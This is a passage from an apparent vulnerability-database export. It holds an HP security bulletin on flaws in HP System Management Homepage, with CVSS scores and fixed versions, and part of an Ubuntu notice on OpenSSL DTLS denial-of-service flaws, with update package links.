2010-04-20\r\nLast Updated: 2010-04-20\r\n\r\nPotential Security Impact: Remote cross site scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;, execution of arbitrary code, unauthorized access\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP System Management Homepage &#40;SMH&#41; for Linux and Windows. These vulnerabilities could be exploited\r\nremotely to allow cross site scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;, execution of arbitrary code, and unauthorized access.\r\n\r\nReferences: CVE-2008-1468, CVE-2008-4226, CVE-2008-5557, CVE-2008-5814, CVE-2009-1377, CVE-2009-1378, CVE-2009-1379, CVE-2009-1386, CVE-2009-1387, CVE-2010-1034\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP System Management Homepage for Windows all versions prior to 6.0\r\nHP System Management Homepage for Linux &#40;x86&#41; all versions prior to 6.0\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41; all versions prior to 6.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2008-1468 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41; 4.3\r\nCVE-2008-4226 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\nCVE-2008-5557 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\nCVE-2008-5814 &#40;AV:N/AC:H/Au:N/C:N/I:P/A:N&#41; 2.6\r\nCVE-2009-1377 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-1378 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-1379 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-1386 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-1387 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2010-1034 &#40;AV:N/AC:H/Au:S/C:P/I:P/A:P&#41; 4.6\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following resolutions.\r\n\r\nHP System Management Homepage for Windows v6.0.0.96 &#40;or subsequent&#41;\r\n\r\nHP System Management Homepage for Linux &#40;x86&#41; v6.0.0-95 &#40;or subsequent&#41;\r\n\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41; v6.0.0-95 &#40;or subsequent&#41;\r\n\r\nNote:\r\nHP System Management Homepage for Windows v6.0.0.96 contains Namazu v2.0.18 and PHP v5.2.9\r\nHP System Management Homepage for Linux v6.0.0-95 contains Namazu v2.0.19 and PHP v5.2.9\r\n\r\nDownloads are available from the following locations:\r\n\r\nHP System Management Homepage v6.0.0.96 for Windows can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&amp;cc=us&amp;prodTypeId=15351&amp;prodSeriesId=1121486&amp;prodNameId=3288144&amp;swEnvOID=4064&amp;swLang=8&amp;mode=2&amp;taskId=135&amp;swItem=MTX-24b3c024ec034eee9a16c3cb3c\r\n\r\nHP System Management Homepage for Linux &#40;x86&#41;, v6.0.0-95 for Linux X86 OS can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&amp;cc=us&amp;prodTypeId=15351&amp;prodSeriesId=1121486&amp;prodNameId=3288144&amp;swEnvOID=4048&amp;swLang=8&amp;mode=2&amp;taskId=135&amp;swItem=MTX-07a54b93a826424faf044ba986\r\n\r\nHP System Management Homepage for Linux &#40;AMD64/EM64T&#41;, v6.0.0-95 for Linux 64-bit OS can be downloaded from\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&amp;cc=us&amp;prodTypeId=15351&amp;prodSeriesId=1121486&amp;prodNameId=3288144&amp;swEnvOID=4049&amp;swLang=8&amp;mode=2&amp;taskId=135&amp;swItem=MTX-0ac5d5c51abe472da22373a2f5\r\n\r\nNote: The updates can be also be located with the following procedure:\r\n1. Browse to http://h20000.www2.hp.com/bizsupport\r\n2. Search for: HP System Management Homepage for Windows Version 6.0.0.96 or HP System Management Homepage for Linux Version 6.0.0-95\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\nNone\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 20 April 2010 Initial Release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the\r\ncustomer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features\r\nof software products to provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information\r\ncontained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action.\r\nHP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user&#39;s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &quot;as is&quot; without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential\r\ndamages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein\r\nare trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAkvNwl8ACgkQ4B86/C0qfVksggCeO4bBV9JZUa3asj93QIm6h+vx\r\nJw4An0cWEO4jwId62IHvBI7d4vQBeOtj\r\n=h80D\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-04-26T00:00:00", "title": "[security bulletin] HPSBMA02492 SSRT100079 rev.1 - HP System Management Homepage &#40;SMH&#41; for Linux and Windows, Remote Cross Site Scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;, Execution of Arbitrary Code, Unauthorized Access", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:34", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2008-4226", "CVE-2009-1387", "CVE-2008-5814", "CVE-2009-1378", "CVE-2010-1034", "CVE-2008-1468", "CVE-2008-5557"], "modified": "2010-04-26T00:00:00", "id": "SECURITYVULNS:DOC:23702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23702", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "references": [], "description": "===========================================================\r\nUbuntu Security Notice USN-792-1 June 25, 2009\r\nopenssl vulnerabilities\r\nCVE-2009-1377, CVE-2009-1378, CVE-2009-1379, CVE-2009-1386,\r\nCVE-2009-1387\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 8.10\r\nUbuntu 9.04\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n libssl0.9.8 0.9.8a-7ubuntu0.9\r\n\r\nUbuntu 8.04 LTS:\r\n libssl0.9.8 0.9.8g-4ubuntu3.7\r\n\r\nUbuntu 8.10:\r\n libssl0.9.8 0.9.8g-10.1ubuntu2.4\r\n\r\nUbuntu 9.04:\r\n libssl0.9.8 0.9.8g-15ubuntu3.2\r\n\r\nAfter a standard system upgrade you need to reboot your computer to\r\neffect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that OpenSSL did not limit the number of DTLS records it\r\nwould buffer when they arrived with a future epoch. A remote attacker could\r\ncause a denial of service via memory resource consumption by sending a\r\nlarge number of crafted requests. &#40;CVE-2009-1377&#41;\r\n\r\nIt was discovered that OpenSSL did not properly free memory when processing\r\nDTLS fragments. A remote attacker could cause a denial of service via\r\nmemory resource consumption by sending a large number of crafted requests.\r\n&#40;CVE-2009-1378&#41;\r\n\r\nIt was discovered that OpenSSL did not properly handle certain server\r\ncertificates when processing DTLS packets. A remote DTLS server could cause\r\na denial of service by sending a message containing a specially crafted\r\nserver certificate. &#40;CVE-2009-1379&#41;\r\n\r\nIt was discovered that OpenSSL did not properly handle a DTLS\r\nChangeCipherSpec packet when it occured before ClientHello. A remote\r\nattacker could cause a denial of service by sending a specially crafted\r\nrequest. &#40;CVE-2009-1386&#41;\r\n\r\nIt was discovered that OpenSSL did not properly handle out of sequence\r\nDTLS handshake messages. A remote attacker could cause a denial of service\r\nby sending a specially crafted request. &#40;CVE-2009-1387&#41;\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9.diff.gz\r\n Size/MD5: 53253 87f974c237cf2465f1ba69786a70d116\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9.dsc\r\n Size/MD5: 822 c615f88992051bbaac37e6420a2221f7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz\r\n Size/MD5: 3271435 1d16c727c10185e4d694f87f5e424ee1\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.9_amd64.udeb\r\n Size/MD5: 572012 12834f1177ca23dc8eed3d3190f3f9dd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.9_amd64.deb\r\n Size/MD5: 2168210 62602f8a3a89a70d9691b88fe76042b5\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.9_amd64.deb\r\n Size/MD5: 1683076 a9f24ae2f1c832d3adb5301eb6e59067\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.9_amd64.deb\r\n Size/MD5: 876572 8302dcca676df67f0c0847b4b3f9e342\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9_amd64.deb\r\n Size/MD5: 985316 44d71c03b9b412e82902052f4fbf1472\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.9_i386.udeb\r\n Size/MD5: 509672 87341336a6d7dc978b569dd2c5852728\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.9_i386.deb\r\n Size/MD5: 2024876 0e05eaef6381362f8bc743f8ee36d352\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.9_i386.deb\r\n Size/MD5: 5054892 c0aeee67870b227ba23acec739d1b454\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.9_i386.deb\r\n Size/MD5: 2597752 d30e9ced45a123bff540701ba75bef42\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9_i386.deb\r\n Size/MD5: 977078 25973096685717fab8bcdbe7cb4cb9b4\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.9_powerpc.udeb\r\n Size/MD5: 557990 4f9698929a22f31299b568d60ff08e8e\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.9_powerpc.deb\r\n Size/MD5: 2182748 2dce0ab311595a8a0e6d199438f501a9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.9_powerpc.deb\r\n Size/MD5: 1728390 eb7be7cf86f4bdb465aa2ab024f13eba\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.9_powerpc.deb\r\n Size/MD5: 862766 e77d5ef7654dfb6709159d294f6d55a6\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9_powerpc.deb\r\n Size/MD5: 981264 022eb8d31af292f5687ae4c64e7aa91b\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.9_sparc.udeb\r\n Size/MD5: 531120 186546bedff49ed2fcc04f763bf38392\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.9_sparc.deb\r\n Size/MD5: 2093936 f5735293aedc793db71104115f419f10\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.9_sparc.deb\r\n Size/MD5: 3943820 3451bab80db0761c0761da51aa821d6f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.9_sparc.deb\r\n Size/MD5: 2093082 a1fcf0ce22f95ba5bf79ca12f9b73df0\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.9_sparc.deb\r\n Size/MD5: 989480 1a00b8291337bb2c28dac6c9485ca48f\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7.diff.gz\r\n Size/MD5: 56958 cff78d7149ed0b5299b6dbcebe172449\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7.dsc\r\n Size/MD5: 920 5d1a9093f06b84fcff699f1cf3edc607\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz\r\n Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-4ubuntu3.7_all.deb\r\n Size/MD5: 629534 b019bfd2b45105f87f8efc0e0e2c57ba\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.7_amd64.udeb\r\n Size/MD5: 603930 47c316642dbd05991b44d2a96d817e28\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.7_amd64.deb\r\n Size/MD5: 2065162 04330fc9ba3cfa6db8b9075629b72322\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.7_amd64.deb\r\n Size/MD5: 1605794 98232ff640f761cd87740e1eb1f02d4f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.7_amd64.deb\r\n Size/MD5: 932342 29590cb43838f3f8f81d88ed8154a0ee\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7_amd64.deb\r\n Size/MD5: 390630 fc3bbf71bb5976c03c94e19ddd82af88\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.7_i386.udeb\r\n Size/MD5: 564892 376330d1955bf835417462a33841a133\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.7_i386.deb\r\n Size/MD5: 1942186 d9e6b58917e62ad633777d72384bc9b0\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.7_i386.deb\r\n Size/MD5: 5343766 ef17488c59d6228e28d88f080f74a237\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.7_i386.deb\r\n Size/MD5: 2830542 0152babd0468e95fe2af057f9ec48eac\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7_i386.deb\r\n Size/MD5: 385440 51e3a3d01d81160b78da8b8573a4884b\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.7_lpia.udeb\r\n Size/MD5: 535648 cd75f1e3449222ac477bb0b83ac935fb\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.7_lpia.deb\r\n Size/MD5: 1922920 70ad8e9d094d81eb687819dbbb551419\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.7_lpia.deb\r\n Size/MD5: 1513740 f0a3e598e9f39f830e0162166f044c05\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.7_lpia.deb\r\n Size/MD5: 844004 bedf8086e132ba66c829dee413aab91e\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7_lpia.deb\r\n Size/MD5: 390002 837048bf21a26366a2fcad9e583b7db9\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.7_powerpc.udeb\r\n Size/MD5: 610436 915d7b1a18534489a2e27301ee671eb4\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.7_powerpc.deb\r\n Size/MD5: 2078284 bccac062565de5774571a2b76216c74b\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.7_powerpc.deb\r\n Size/MD5: 1640882 54825577a2ecdf2d771893f65d9a7c8d\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.7_powerpc.deb\r\n Size/MD5: 945786 48d706a0ca031a9d33e928bd51247934\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7_powerpc.deb\r\n Size/MD5: 399188 8331639d9850f7c065aa78837324fb13\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-4ubuntu3.7_sparc.udeb\r\n Size/MD5: 559848 a522bad57cee02558a86694c0691b464\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-4ubuntu3.7_sparc.deb\r\n Size/MD5: 1985110 d0009538a805c85df0f63dcbb0bde87d\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-4ubuntu3.7_sparc.deb\r\n Size/MD5: 3875618 841db8858f14b3254059e239d82a7f8d\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-4ubuntu3.7_sparc.deb\r\n Size/MD5: 2243292 253fba99206214eb43b8b7fad9698134\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-4ubuntu3.7_sparc.deb\r\n Size/MD5: 397832 0604c656a8d83aa48c18356b57b8eb76\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4.diff.gz\r\n Size/MD5: 58295 27131b02a14b8eec1231c265a1a9b23d\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4.dsc\r\n Size/MD5: 1334 33677990cb932f428aab435020080ab2\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz\r\n Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-10.1ubuntu2.4_all.deb\r\n Size/MD5: 629288 4f61130ede1f692d1028c53e1e3d93ea\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.4_amd64.udeb\r\n Size/MD5: 622232 2f1f1e33efde682cc4f9d3af0396e4c5\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.4_amd64.deb\r\n Size/MD5: 2109986 58ad8b6d599b4a4d6305e2723827efda\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.4_amd64.deb\r\n Size/MD5: 1685564 ea2b52f89149f522c8a30b31b11c0945\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.4_amd64.deb\r\n Size/MD5: 958772 7df1fa64d643a4d2a0e16cc1e0157764\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4_amd64.deb\r\n Size/MD5: 403994 48219634a14ccd5e350ae38ae0d29d60\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.4_i386.udeb\r\n Size/MD5: 578878 9c4094653b90cc9ec2a804f797747169\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.4_i386.deb\r\n Size/MD5: 1980958 ca5de9716191a25f21c87c8a29f9f9f7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.4_i386.deb\r\n Size/MD5: 5606896 133fdaae145613d9a52b3223d6b70149\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.4_i386.deb\r\n Size/MD5: 2921540 c93d55358156e9bf8e61a5765fa378a8\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4_i386.deb\r\n Size/MD5: 398662 912335262d25fd7c9a0b4f1541dae478\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.4_lpia.udeb\r\n Size/MD5: 547516 2a5d21745c16ed646090fd4d8c7d5d02\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.4_lpia.deb\r\n Size/MD5: 1958290 b5cd365dae859ff6569bf88f4e1519f2\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.4_lpia.deb\r\n Size/MD5: 1580346 900aa241ac8ffeb6100441b5682043c1\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.4_lpia.deb\r\n Size/MD5: 863532 1dd86f6f458e506713043d147e46eb53\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4_lpia.deb\r\n Size/MD5: 400634 191127c00f20afb7080cee7adf99f727\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.4_powerpc.udeb\r\n Size/MD5: 623294 865ea56a70d492233dbd591fb7525182\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.4_powerpc.deb\r\n Size/MD5: 2120492 beff836138f8458b577a34915096f98a\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.4_powerpc.deb\r\n Size/MD5: 1705386 0f50063f18599c75cbd8fcbbdf19c8ab\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.4_powerpc.deb\r\n Size/MD5: 965398 690867a976c25fe72f5787a3a35fed5b\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4_powerpc.deb\r\n Size/MD5: 402640 1aac2523a49bb4277e7d360473ad7f7c\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-10.1ubuntu2.4_sparc.udeb\r\n Size/MD5: 567678 9185ca765789f0fa399ef054d78b3d47\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl-dev_0.9.8g-10.1ubuntu2.4_sparc.deb\r\n Size/MD5: 2013830 893e17790fe4318a2ed2c70b60d1b064\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8g-10.1ubuntu2.4_sparc.deb\r\n Size/MD5: 4039030 641f686d1fa3ed9f6e80da208584f0cf\r\n http://ports.ubuntu.com/pool/main/o/openssl/libssl0.9.8_0.9.8g-10.1ubuntu2.4_sparc.deb\r\n Size/MD5: 2285898 fe9b3a7286b2b8dde33fdcbad62884f6\r\n http://ports.ubuntu.com/pool/main/o/openssl/openssl_0.9.8g-10.1ubuntu2.4_sparc.deb\r\n Size/MD5: 406762 218f033e0df04f50a1f99feb92ccc232\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2.diff.gz\r\n Size/MD5: 60766 4a4112e240bb7e4ec9762bfd0542fa6b\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g-15ubuntu3.2.dsc\r\n Size/MD5: 1437 1bdb5dcd678616fbefdb7fe8c288b9bb\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8g.orig.tar.gz\r\n Size/MD5: 3354792 acf70a16359bf3658bdfb74bda1c4419\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl-doc_0.9.8g-15ubuntu3.2_all.deb\r\n Size/MD5: 630184 